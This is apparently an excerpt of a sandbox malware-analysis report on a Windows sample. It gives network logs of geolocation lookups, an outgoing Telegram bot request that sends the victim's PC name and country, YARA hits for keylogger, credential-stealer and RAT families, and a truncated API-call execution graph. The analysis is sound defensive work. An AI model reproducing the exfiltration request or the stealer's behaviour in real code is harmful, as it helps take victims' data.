                                                                                                                                                  2024-11-25 06:10:14 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                                                                  Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  5192.168.2.649871172.67.177.1344434488C:\Users\user\Desktop\MC8017774DOCS.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  2024-11-25 06:10:17 UTC60OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                                                  2024-11-25 06:10:18 UTC851INHTTP/1.1 200 OK
                                                                                                                                                  Date: Mon, 25 Nov 2024 06:10:17 GMT
                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                  Content-Length: 361
                                                                                                                                                  Connection: close
                                                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                  Age: 478926
                                                                                                                                                  Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pqryd35Sy3u0gfyl0NvgrjgLCZ5gUn9QN0cxPx581r4z%2BGLSRAcCZR0cmUa74JUvLTW7My%2FSC2XqDy0kNtHzmBPcqFBaeKunsxanj9VcT5vfD3Bqwrai2UM%2BJZ8MFGa6GFvhs5YN"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                  Server: cloudflare
                                                                                                                                                  CF-RAY: 8e7f798e0bb7429b-EWR
                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1656&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=698&delivery_rate=1712609&cwnd=251&unsent_bytes=0&cid=c087a095f61beb69&ts=455&x=0"
                                                                                                                                                  2024-11-25 06:10:18 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                                                                  Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  6192.168.2.649882172.67.177.1344434488C:\Users\user\Desktop\MC8017774DOCS.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  2024-11-25 06:10:20 UTC60OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                                                  2024-11-25 06:10:21 UTC845INHTTP/1.1 200 OK
                                                                                                                                                  Date: Mon, 25 Nov 2024 06:10:21 GMT
                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                  Content-Length: 361
                                                                                                                                                  Connection: close
                                                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                  Age: 478930
                                                                                                                                                  Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=V9xrbQOYZj6fAmfFiW7l02dk5arnAdGjyH2osUp9B1N8bnHA492uq0d72q5zhx4OQNzZRYYS4zZC0WCdP2Oprke3qN7BhQXvWDkOFbG53vtM1ERQGVciG45yNp8KquM8nEOTIadV"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                  Server: cloudflare
                                                                                                                                                  CF-RAY: 8e7f79a2f82e8cd6-EWR
                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1972&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=698&delivery_rate=1360037&cwnd=165&unsent_bytes=0&cid=5ab10eb46a64bbe5&ts=472&x=0"
                                                                                                                                                  2024-11-25 06:10:21 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                                                                  Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  7192.168.2.649890172.67.177.1344434488C:\Users\user\Desktop\MC8017774DOCS.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  2024-11-25 06:10:24 UTC60OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                                                  2024-11-25 06:10:24 UTC855INHTTP/1.1 200 OK
                                                                                                                                                  Date: Mon, 25 Nov 2024 06:10:24 GMT
                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                  Content-Length: 361
                                                                                                                                                  Connection: close
                                                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                  Age: 478933
                                                                                                                                                  Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AHlPrWgRLyG%2B10mPLICEKnjCr%2F78Mu9r27apIFZeiLe0G7im3XB4XRETPSuJNhKz1l4HRaxAt8FafCq%2BO1zS%2BnVvKKq5wUCy%2BdcQA0mY5vXNU9abGBr6v1QUvJW61lSVgmpNOvzm"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                  Server: cloudflare
                                                                                                                                                  CF-RAY: 8e7f79b77b3a0cb2-EWR
                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1581&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=698&delivery_rate=1760096&cwnd=146&unsent_bytes=0&cid=6aefe757e1a600ad&ts=458&x=0"
                                                                                                                                                  2024-11-25 06:10:24 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                                                                  Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  8192.168.2.649902172.67.177.1344434488C:\Users\user\Desktop\MC8017774DOCS.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  2024-11-25 06:10:27 UTC60OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                                                  2024-11-25 06:10:28 UTC855INHTTP/1.1 200 OK
                                                                                                                                                  Date: Mon, 25 Nov 2024 06:10:28 GMT
                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                  Content-Length: 361
                                                                                                                                                  Connection: close
                                                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                  Age: 478937
                                                                                                                                                  Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UlQ1hsLsWqo0OPhQKS%2FZ2TPaSG1XiK%2F%2BH8Q%2FrztXHsvaEe4gigINaQTbNsY7LDh1IyCLQoSGvveaj1jOTPoUg1N7m%2BC4V1Tgwky20HB0pgfWclOiMeUnjVREtnHnQQVPBzwE6lKy"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                  Server: cloudflare
                                                                                                                                                  CF-RAY: 8e7f79ce8b364228-EWR
                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1709&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1634023&cwnd=194&unsent_bytes=0&cid=c99305673940036f&ts=466&x=0"
                                                                                                                                                  2024-11-25 06:10:28 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                                                                  Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  9192.168.2.649907149.154.167.2204434488C:\Users\user\Desktop\MC8017774DOCS.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  2024-11-25 06:10:30 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:506013%0D%0ADate%20and%20Time:%2026/11/2024%20/%2015:27:34%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20506013%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                                                                  Host: api.telegram.org
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  2024-11-25 06:10:30 UTC344INHTTP/1.1 404 Not Found
                                                                                                                                                  Server: nginx/1.18.0
                                                                                                                                                  Date: Mon, 25 Nov 2024 06:10:30 GMT
                                                                                                                                                  Content-Type: application/json
                                                                                                                                                  Content-Length: 55
                                                                                                                                                  Connection: close
                                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                                  2024-11-25 06:10:30 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                                                                  Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                                                                  Statistics

                                                                                                                                                  CPU Usage

                                                                                                                                                  Click to jump to process

                                                                                                                                                  Memory Usage

                                                                                                                                                  Click to jump to process

                                                                                                                                                  High Level Behavior Distribution

                                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                                  Behavior

                                                                                                                                                  Click to jump to process

                                                                                                                                                  System Behavior

                                                                                                                                                  General

                                                                                                                                                  Target ID:0
                                                                                                                                                  Start time:01:09:07
                                                                                                                                                  Start date:25/11/2024
                                                                                                                                                  Path:C:\Users\user\Desktop\MC8017774DOCS.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:"C:\Users\user\Desktop\MC8017774DOCS.exe"
                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                  File size:567'152 bytes
                                                                                                                                                  MD5 hash:D4C19E96D83BD586016A3BE2E3A57F1D
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Yara matches:
                                                                                                                                                  • Rule: JoeSecurity_GuLoader_3, Description: Yara detected GuLoader, Source: 00000000.00000002.2522145206.0000000000848000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2522664351.00000000037E7000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  Reputation:low
                                                                                                                                                  Has exited:true

                                                                                                                                                  General

                                                                                                                                                  Target ID:4
                                                                                                                                                  Start time:01:09:39
                                                                                                                                                  Start date:25/11/2024
                                                                                                                                                  Path:C:\Users\user\Desktop\MC8017774DOCS.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:"C:\Users\user\Desktop\MC8017774DOCS.exe"
                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                  File size:567'152 bytes
                                                                                                                                                  MD5 hash:D4C19E96D83BD586016A3BE2E3A57F1D
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Yara matches:
                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000003.2640209987.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000004.00000003.2640209987.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000004.00000003.2640209987.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000004.00000003.2640209987.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.3480962363.0000000036720000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000004.00000002.3480962363.0000000036720000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000004.00000002.3480962363.0000000036720000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000004.00000002.3480962363.0000000036720000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000004.00000002.3480962363.0000000036720000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                  • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000004.00000002.3480962363.0000000036720000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000004.00000002.3480962363.0000000036720000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                  • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                  • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000004.00000002.3476754356.0000000033D31000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.3450065086.000000000006F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000004.00000002.3450065086.000000000006F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000004.00000002.3450065086.000000000006F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000004.00000002.3450065086.000000000006F000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                  Reputation:low
                                                                                                                                                  Has exited:false

                                                                                                                                                  Disassembly

                                                                                                                                                  Reset < >

                                                                                                                                                    Execution Graph

                                                                                                                                                    Execution Coverage:19.2%
                                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                    Signature Coverage:19.6%
                                                                                                                                                    Total number of Nodes:1557
                                                                                                                                                    Total number of Limit Nodes:39
                                                                                                                                                    execution_graph 3986 401941 3987 401943 3986->3987 3992 402c41 3987->3992 3993 402c4d 3992->3993 4038 4062b9 3993->4038 3996 401948 3998 4059a9 3996->3998 4080 405c74 3998->4080 4001 4059d1 DeleteFileW 4008 401951 4001->4008 4002 4059e8 4005 405b13 4002->4005 4094 406297 lstrcpynW 4002->4094 4004 405a0e 4006 405a21 4004->4006 4007 405a14 lstrcatW 4004->4007 4005->4008 4123 4065da FindFirstFileW 4005->4123 4095 405bb8 lstrlenW 4006->4095 4009 405a27 4007->4009 4012 405a37 lstrcatW 4009->4012 4013 405a2d 4009->4013 4015 405a42 lstrlenW FindFirstFileW 4012->4015 4013->4012 4013->4015 4017 405b08 4015->4017 4036 405a64 4015->4036 4016 405b31 4126 405b6c lstrlenW CharPrevW 4016->4126 4017->4005 4020 405aeb FindNextFileW 4023 405b01 FindClose 4020->4023 4020->4036 4021 405961 5 API calls 4024 405b43 4021->4024 4023->4017 4025 405b47 4024->4025 4026 405b5d 4024->4026 4025->4008 4029 4052ff 24 API calls 4025->4029 4028 4052ff 24 API calls 4026->4028 4028->4008 4031 405b54 4029->4031 4030 4059a9 60 API calls 4030->4036 4033 40605d 36 API calls 4031->4033 4032 4052ff 24 API calls 4032->4020 4034 405b5b 4033->4034 4034->4008 4036->4020 4036->4030 4036->4032 4099 406297 lstrcpynW 4036->4099 4100 405961 4036->4100 4108 4052ff 4036->4108 4119 40605d MoveFileExW 4036->4119 4042 4062c6 4038->4042 4039 406511 4040 402c6e 4039->4040 4071 406297 lstrcpynW 4039->4071 4040->3996 4055 40652b 4040->4055 4042->4039 4043 4064df lstrlenW 4042->4043 4045 4062b9 10 API calls 4042->4045 4048 4063f4 GetSystemDirectoryW 4042->4048 4049 406407 GetWindowsDirectoryW 4042->4049 4050 40652b 5 API calls 4042->4050 4051 4062b9 10 API calls 4042->4051 4052 406482 lstrcatW 4042->4052 4053 40643b SHGetSpecialFolderLocation 4042->4053 4064 406165 4042->4064 4069 4061de wsprintfW 4042->4069 4070 406297 lstrcpynW 4042->4070 4043->4042 4045->4043 4048->4042 4049->4042 4050->4042 4051->4042 4052->4042 4053->4042 4054 406453 SHGetPathFromIDListW CoTaskMemFree 4053->4054 4054->4042 4061 406538 4055->4061 4056 4065ae 4057 4065b3 CharPrevW 4056->4057 4059 4065d4 4056->4059 4057->4056 4058 4065a1 CharNextW 4058->4056 4058->4061 4059->3996 4061->4056 4061->4058 4062 40658d CharNextW 4061->4062 4063 40659c CharNextW 4061->4063 4076 405b99 4061->4076 4062->4061 4063->4058 4072 406104 4064->4072 4067 4061c9 4067->4042 4068 406199 RegQueryValueExW RegCloseKey 4068->4067 4069->4042 4070->4042 4071->4040 4073 406113 4072->4073 4074 406117 4073->4074 4075 40611c RegOpenKeyExW 4073->4075 4074->4067 4074->4068 4075->4074 4077 405b9f 4076->4077 4078 405bb5 4077->4078 4079 405ba6 CharNextW 4077->4079 4078->4061 4079->4077 4129 406297 lstrcpynW 4080->4129 4082 405c85 4130 405c17 CharNextW CharNextW 4082->4130 4085 4059c9 4085->4001 4085->4002 4086 40652b 5 API calls 4092 405c9b 4086->4092 4087 405ccc lstrlenW 4088 405cd7 4087->4088 4087->4092 4090 405b6c 3 API calls 4088->4090 4089 4065da 2 API calls 4089->4092 4091 405cdc GetFileAttributesW 4090->4091 4091->4085 4092->4085 4092->4087 4092->4089 4093 405bb8 2 API calls 4092->4093 4093->4087 4094->4004 4096 405bc6 4095->4096 4097 405bd8 4096->4097 4098 405bcc CharPrevW 4096->4098 4097->4009 4098->4096 4098->4097 4099->4036 4136 405d68 GetFileAttributesW 4100->4136 4103 405984 DeleteFileW 4106 40598a 4103->4106 4104 40597c RemoveDirectoryW 4104->4106 4105 40598e 4105->4036 4106->4105 4107 40599a SetFileAttributesW 4106->4107 4107->4105 4110 40531a 4108->4110 4118 4053bc 4108->4118 4109 405336 lstrlenW 4112 405344 lstrlenW 4109->4112 4113 40535f 4109->4113 4110->4109 4111 4062b9 17 API calls 4110->4111 4111->4109 4114 405356 lstrcatW 4112->4114 4112->4118 4115 405372 4113->4115 4116 405365 SetWindowTextW 4113->4116 4114->4113 4117 405378 SendMessageW SendMessageW SendMessageW 4115->4117 4115->4118 4116->4115 4117->4118 4118->4036 4120 40607e 4119->4120 4121 406071 4119->4121 4120->4036 4139 405ee3 4121->4139 4124 4065f0 FindClose 4123->4124 4125 405b2d 4123->4125 4124->4125 4125->4008 4125->4016 4127 405b37 4126->4127 4128 405b88 lstrcatW 4126->4128 4127->4021 4128->4127 4129->4082 4131 405c34 4130->4131 4135 405c46 4130->4135 4133 405c41 CharNextW 4131->4133 4131->4135 4132 405c6a 4132->4085 4132->4086 4133->4132 4134 405b99 CharNextW 4134->4135 4135->4132 4135->4134 4137 40596d 4136->4137 4138 405d7a SetFileAttributesW 4136->4138 4137->4103 4137->4104 4137->4105 4138->4137 4140 405f13 4139->4140 4141 405f39 GetShortPathNameW 4139->4141 4166 405d8d GetFileAttributesW CreateFileW 4140->4166 4143 406058 4141->4143 4144 405f4e 4141->4144 4143->4120 4144->4143 4146 405f56 wsprintfA 4144->4146 4145 405f1d CloseHandle GetShortPathNameW 4145->4143 4147 405f31 4145->4147 4148 4062b9 17 API calls 4146->4148 4147->4141 4147->4143 4149 405f7e 4148->4149 4167 405d8d GetFileAttributesW CreateFileW 4149->4167 4151 405f8b 4151->4143 4152 405f9a GetFileSize GlobalAlloc 4151->4152 4153 406051 CloseHandle 4152->4153 4154 405fbc 4152->4154 4153->4143 4168 405e10 ReadFile 4154->4168 4159 